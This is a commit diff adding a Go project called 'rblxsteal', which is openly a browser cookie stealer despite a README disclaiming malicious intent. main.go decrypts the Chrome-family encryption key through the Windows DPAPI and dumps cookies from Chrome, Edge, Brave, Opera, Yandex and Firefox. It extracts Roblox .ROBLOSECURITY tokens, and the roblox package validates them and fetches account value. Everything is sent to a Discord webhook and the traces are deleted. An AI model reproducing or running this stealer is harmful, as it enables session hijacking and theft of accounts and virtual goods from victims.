add files

1 year ago · 23f75ef2da
--- a/README.md
+++ b/README.md
@@ -0,0 +1,3 @@
 I am not responsible for anything malicious done
 I do not condone malicious activities
 I wrote this for research purposes.
--- a/go.mod
+++ b/go.mod
@@ -0,0 +1,10 @@
 module rblxsteal

 go 1.20

 require (
 	github.com/DisgoOrg/disgohook v1.4.4 // indirect
 	github.com/DisgoOrg/log v1.1.0 // indirect
 	github.com/DisgoOrg/restclient v1.2.8 // indirect
 	github.com/mattn/go-sqlite3 v1.14.16 // indirect
 )
--- a/go.sum
+++ b/go.sum
@@ -0,0 +1,14 @@
 github.com/DisgoOrg/disgohook v1.4.4 h1:6xU+nRtyCYX7RyKvRnroJE8JMv+YIrQEMBDGUjBGDlQ=
 github.com/DisgoOrg/disgohook v1.4.4/go.mod h1:l7r9dZgfkA3KiV+ErxqweKaknnskmzZO+SRTNHvJTUU=
 github.com/DisgoOrg/log v1.1.0 h1:a6hLfVSDuTFJc5AKQ8FDYQ5TASnwk3tciUyXThm1CR4=
 github.com/DisgoOrg/log v1.1.0/go.mod h1:Qihgz6fax3JCfuO7vxVavL0LyHS0sUdQ9OmykQ2fiQs=
 github.com/DisgoOrg/restclient v1.2.8 h1:0Kv2g2bNYUvAAeIpJ1oNHorRcj5z6qkO2kOlm4R7cAs=
 github.com/DisgoOrg/restclient v1.2.8/go.mod h1:2pc/htya/5kjxvWNYya98sb8B4mexobxmWvhTiWPt94=
 github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
 github.com/mattn/go-sqlite3 v1.14.16 h1:yOQRA0RpS5PFz/oikGwBEqvAWhWg5ufRz4ETLjwpU1Y=
 github.com/mattn/go-sqlite3 v1.14.16/go.mod h1:2eHXhiwb8IkHr+BDWZGa96P6+rkvnG63S2DGjv9HUNg=
 github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
 github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
 github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
 gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
 gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
--- a/main.go
+++ b/main.go
@@ -0,0 +1,329 @@
 package main

 import (
 	"crypto/aes"
 	"crypto/cipher"
 	"database/sql"
 	b64 "encoding/base64"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
 	"log"
 	"math/rand"
 	"os"
 	"path/filepath"
 	R "rblxsteal/roblox"
 	"strings"
 	"syscall"
 	"unsafe"

 	"github.com/DisgoOrg/disgohook"
 	"github.com/DisgoOrg/disgohook/api"
 	_ "github.com/mattn/go-sqlite3"
 )

 var webhook string = "webhook here"
 var webhook_id string = strings.Split(webhook, "/")[5] + "/" + strings.Split(webhook, "/")[6]

 type BrowserPath struct {
 	name        string
 	processname string
 	token       string
 	password    string
 	cookies     string
 	extensions  string
 }
 type Output struct {
 	host_key interface{}
 	name     interface{}
 	enc      interface{}
 }

 type PasswordOutput struct {
 	url      string
 	username string
 	password []byte
 }

 type MozCookies struct {
 	host  string
 	name  string
 	value []byte
 }

 type Cookies struct {
 	url   string
 	name  string
 	value string
 }

 type mystruct struct {
 	Hello string `json:"hello,omitempty"`
 }

 type DATA_BLOB struct {
 	cbData uint32
 	pbData *byte
 }

 func NewBlob(d []byte) *DATA_BLOB {
 	if len(d) == 0 {
 		return &DATA_BLOB{}
 	}
 	return &DATA_BLOB{
 		pbData: &d[0],
 		cbData: uint32(len(d)),
 	}
 }

 func unencrypt(buff []byte, master_key []byte) string {

 	starts := string(buff[:3])
 	if starts == "v10" || starts == "v11" {
 		iv := buff[3:15]
 		payload := buff[15:]
 		block, err := aes.NewCipher(master_key)
 		if err != nil {
 			panic(err.Error())
 		}
 		aead, err := cipher.NewGCM(block)
 		if err != nil {
 			panic(err.Error())
 		}
 		decrypted_pass, err := aead.Open(nil, iv, payload, nil)
 		if err != nil {
 			panic(err.Error())
 		}
 		return string(decrypted_pass)
 	}
 	return ""

 }

 func (b *DATA_BLOB) ToByteArray() []byte {
 	d := make([]byte, b.cbData)
 	copy(d, (*[1 << 30]byte)(unsafe.Pointer(b.pbData))[:])
 	return d
 }

 func GetEncryptionKey() []byte {
 	local_path := filepath.Join(os.Getenv("USERPROFILE"), "AppData", "Local", "Google", "Chrome", "User Data", "Local State")
 	local_state_data, err := ioutil.ReadFile(local_path)
 	if err != nil {

 	}
 	data := make(map[string]interface{})
 	err = json.Unmarshal([]byte(local_state_data), &data)
 	if err != nil {

 	}
 	os_crypt := data["os_crypt"].(map[string]interface{})
 	key := os_crypt["encrypted_key"]
 	decoded_key, _ := b64.StdEncoding.DecodeString(key.(string))
 	unprotected_key := decoded_key[5:]
 	decreyptedkey, e := Decrypt(unprotected_key)
 	if e != nil {
 	}
 	return decreyptedkey
 }
 func Decrypt(data []byte) ([]byte, error) {
 	dllcrypt32 := syscall.NewLazyDLL("Crypt32.dll")
 	procDecryptData := dllcrypt32.NewProc("CryptUnprotectData")
 	dllkernel32 := syscall.NewLazyDLL("Kernel32.dll")
 	procLocalFree := dllkernel32.NewProc("LocalFree")
 	var outblob DATA_BLOB
 	r, _, err := procDecryptData.Call(uintptr(unsafe.Pointer(NewBlob(data))), 0, 0, 0, 0, 0, uintptr(unsafe.Pointer(&outblob)))
 	if r == 0 {
 		return nil, err
 	}
 	defer procLocalFree.Call(uintptr(unsafe.Pointer(outblob.pbData)))
 	return outblob.ToByteArray(), nil
 }

 const letterBytes = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

 func checkPathExists(p string) bool {
 	_, err := os.Stat(p)
 	if err == nil {
 		return true
 	}
 	if os.IsNotExist(err) {
 		return false
 	}
 	return false
 }
 func RandStringBytes(n int) string {
 	b := make([]byte, n)
 	for i := range b {
 		b[i] = letterBytes[rand.Intn(len(letterBytes))]
 	}
 	return string(b)
 }

 func getCookies(path string, cookiePath string, cookies []Cookies) []Cookies {
 	if !checkPathExists(path) {
 		return cookies
 	}
 	pathC := path + cookiePath + "/Cookies"

 	if !checkPathExists(pathC) {
 		return cookies
 	}

 	random_path := "kur" + RandStringBytes(8) + ".db"
 	f, _ := ioutil.ReadFile(pathC)
 	os.Create(random_path)
 	os.WriteFile(random_path, f, 0644)
 	db, err := sql.Open("sqlite3", random_path)
 	if err != nil {
 		log.Fatal(err)
 	}
 	defer db.Close()
 	row, err := db.Query("SELECT host_key, name, encrypted_value FROM cookies")
 	os.Remove(random_path)
 	if err != nil {
 		log.Fatal(err)
 	}
 	pathKey := path + "/Local State"
 	local_state_data, err := ioutil.ReadFile(pathKey)
 	if err != nil {
 		log.Fatal(err)
 	}
 	data := make(map[string]interface{})
 	err = json.Unmarshal([]byte(local_state_data), &data)
 	if err != nil {
 		log.Fatal(err)
 	}
 	os_crypt := data["os_crypt"].(map[string]interface{})
 	key := os_crypt["encrypted_key"]
 	decoded_key, _ := b64.StdEncoding.DecodeString(key.(string))
 	unprotected_key := decoded_key[5:]
 	decreyptedkey, e := Decrypt(unprotected_key)
 	if e != nil {
 		os.Exit(0)
 	}
 	defer row.Close()
 	for row.Next() {
 		var rowout Output
 		row.Scan(&rowout.host_key, &rowout.name, &rowout.enc)
 		cookie := unencrypt(rowout.enc.([]byte), decreyptedkey)
 		tmpCookie := Cookies{rowout.host_key.(string), rowout.name.(string), cookie}
 		cookies = append(cookies, tmpCookie)
 	}
 	return cookies

 }

 func firefox(cookies []Cookies) []Cookies {
 	path := os.Getenv("APPDATA") + `\Mozilla\Firefox\Profiles`
 	if !checkPathExists(path) {
 		return cookies
 	}
 	folders, err := os.ReadDir(path)
 	firefox_cookies := []string{}
 	if err != nil {
 		log.Fatal(err)
 	}
 	for _, dir := range folders {
 		subdir_content, err := os.ReadDir(path + "\\" + dir.Name())
 		if err != nil {
 			log.Fatal(err)
 		}
 		for _, file := range subdir_content {
 			if file.Name() == "cookies.sqlite" {
 				firefox_cookies = append(firefox_cookies, path+"\\"+dir.Name()+"\\cookies.sqlite")
 			}
 		}
 	}
 	for _, i := range firefox_cookies {
 		tmpfp := "kur" + RandStringBytes(8) + ".db"
 		f, _ := ioutil.ReadFile(i)
 		os.Create(tmpfp)
 		os.WriteFile(tmpfp, f, 0644)
 		db, err := sql.Open("sqlite3", tmpfp)
 		defer db.Close()
 		defer os.Remove(tmpfp)
 		if err != nil {
 			os.Remove(tmpfp)
 			log.Fatal(err)
 		}
 		row, err := db.Query("SELECT host, name, value FROM moz_cookies")
 		for row.Next() {
 			var rowout MozCookies
 			row.Scan(&rowout.host, &rowout.name, &rowout.value)
 			tmpCookie := Cookies{rowout.host, rowout.name, string(rowout.value)}
 			cookies = append(cookies, tmpCookie)
 		}
 	}
 	return cookies
 }

 func createCookiesFile(cookies []Cookies) string {
 	outStr := ""

 	for _, i := range cookies {
 		outStr += fmt.Sprintf("URL: %s | NAME: %s | VALUE: %s\n", i.url, i.name, i.value)
 	}
 	return outStr
 }

 func createRobloxDiscordWh(data R.UserInfo) {
 	webhook, _ := disgohook.NewWebhookClientByToken(nil, nil, webhook_id)
 	tosend := fmt.Sprintf("`User ID: `: `%d`\n`User Name`: `%s`\n`Robux`:`%d`\n`BuildersClub`:`%t`\n`Premium`:`%t`\n__Limiteds__ \n```", data.UserID, data.UserName, data.Robux, data.BuildersClub, data.IsPremium)
 	for _, asset := range data.Limiteds {
 		tosend += fmt.Sprintf("Name: %s | RAP: %g\n", asset.Name, asset.RecentAveragePrice)
 	}
 	tosend += "```"
 	tosend += fmt.Sprintf("\n`Token`: `%s`", data.Token)

 	webhook.SendContent(tosend)

 }

 func main() {
 	fmt.Println(webhook_id)
 	allCookies := []Cookies{}
 	roaming := os.Getenv("APPDATA")
 	local := os.Getenv("LOCALAPPDATA")
 	operaGx := BrowserPath{roaming + "/Opera Software/Opera GX Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
 	opera := BrowserPath{roaming + "Opera Software/Opera Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
 	operaNeon := BrowserPath{roaming + "/Opera Software/Opera Neon/User Data/Default", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
 	chrome := BrowserPath{local + "/Google/Chrome/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
 	chromeSxs := BrowserPath{local + "/Google/Chrome SxS/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
 	brave := BrowserPath{local + "/BraveSoftware/Brave-Browser/User Data", "brave.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
 	yandex := BrowserPath{local + "/Yandex/YandexBrowser/User Data", "yandex.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/HougaBouga/nkbihfbeogaeaoehlefnkodbefgpgknn"}
 	edge := BrowserPath{local + "/Microsoft/Edge/User Data", "edge.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
 	browserPaths := []BrowserPath{operaGx, opera, operaNeon, chrome, chromeSxs, brave, yandex, edge}
 	for _, i := range browserPaths {
 		allCookies = getCookies(i.name, i.cookies, allCookies)
 	}
 	allCookies = firefox(allCookies)
 	rblxCookies := []string{}
 	for _, i := range allCookies {
 		if i.name == ".ROBLOSECURITY" {
 			rblxCookies = append(rblxCookies, i.value)
 		}

 	}

 	if len(rblxCookies) != 0 {
 		rblxstuff := R.GetRobloxStuff(rblxCookies)
 		for _, i := range rblxstuff {
 			createRobloxDiscordWh(i)
 		}
 	}
 	towrite := createCookiesFile(allCookies)

 	os.Create("COOKIES.txt")
 	os.WriteFile("COOKIES.txt", []byte(towrite), 0644)
 	webhook, _ := disgohook.NewWebhookClientByToken(nil, nil, webhook_id)
 	reader, _ := os.Open("COOKIES.txt")
 	webhook.SendMessage(api.NewWebhookMessageCreateBuilder().SetContent("All Cookies logged").AddFile("COOKIES.txt", reader).Build())
 	os.Remove("COOKIES.txt")
 	here, _ := os.ReadDir("./")
 	for _, i := range here {
 		if strings.HasSuffix(i.Name(), ".db") {
 			os.Remove(i.Name())
 		}
 	}
 }
--- a/roblox/robloxFunctions.go
+++ b/roblox/robloxFunctions.go
@@ -0,0 +1,93 @@
 package rblxsteal

 import (
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
 	"log"
 	"net/http"
 )

 type UserInfo struct {
 	UserID       int    `json:"UserID"`
 	UserName     string `json:"UserName"`
 	Robux        int    `json:"RobuxBalance"`
 	Thumbnail    string `json:"ThumbnailUrl"`
 	BuildersClub bool   `json:"IsAnyBuildersClubMember"`
 	IsPremium    bool   `json:"IsPremium"`
 	Limiteds     []Asset
 	Token        string
 }

 type Asset struct {
 	Name               string  `json:"name"`
 	RecentAveragePrice float64 `json:"recentAveragePrice"`
 }

 type Response struct {
 	Data []Asset `json:"data"`
 }

 func CheckToken(token string) (UserInfo, bool) {
 	client := http.Client{}
 	userinfo := UserInfo{}
 	req, err := http.NewRequest("GET", "https://www.roblox.com/mobileapi/userinfo", nil)
 	if err != nil {
 		log.Fatal(err)
 	}
 	cookie := http.Cookie{Name: ".ROBLOSECURITY", Value: token}
 	req.AddCookie(&cookie)
 	res, err := client.Do(req)
 	body, err := ioutil.ReadAll(res.Body)
 	sb := string(body)

 	if len(sb) > 500 {
 		return UserInfo{}, false
 	} else {
 		err := json.Unmarshal([]byte(sb), &userinfo)
 		if err != nil {
 			log.Fatal(err)
 		}
 		return userinfo, true
 	}
 }

 func GetLimiteds(id int) []Asset {
 	client := http.Client{}
 	req, err := http.NewRequest("GET", "https://inventory.roblox.com/v1/users/"+fmt.Sprint(id)+"/assets/collectibles", nil)
 	if err != nil {
 		log.Fatal(err)
 	}

 	res, err := client.Do(req)
 	body, err := ioutil.ReadAll(res.Body)
 	sb := string(body)
 	var response Response
 	assets := []Asset{}
 	err = json.Unmarshal([]byte(sb), &response)

 	if err != nil {
 		log.Fatal(err)
 	}
 	for _, asset := range response.Data {
 		tmpAsset := Asset{asset.Name, asset.RecentAveragePrice}
 		assets = append(assets, tmpAsset)
 	}
 	return assets
 }

 func GetRobloxStuff(cookies []string) []UserInfo {
 	users := []UserInfo{}
 	for _, i := range cookies {
 		userInfo, valid := CheckToken(i)
 		userInfo.Token = i
 		if valid != false {
 			userInfo.Limiteds = GetLimiteds(userInfo.UserID)
 			users = append(users, userInfo)

 		} else {

 		}
 	}
 	return users
 }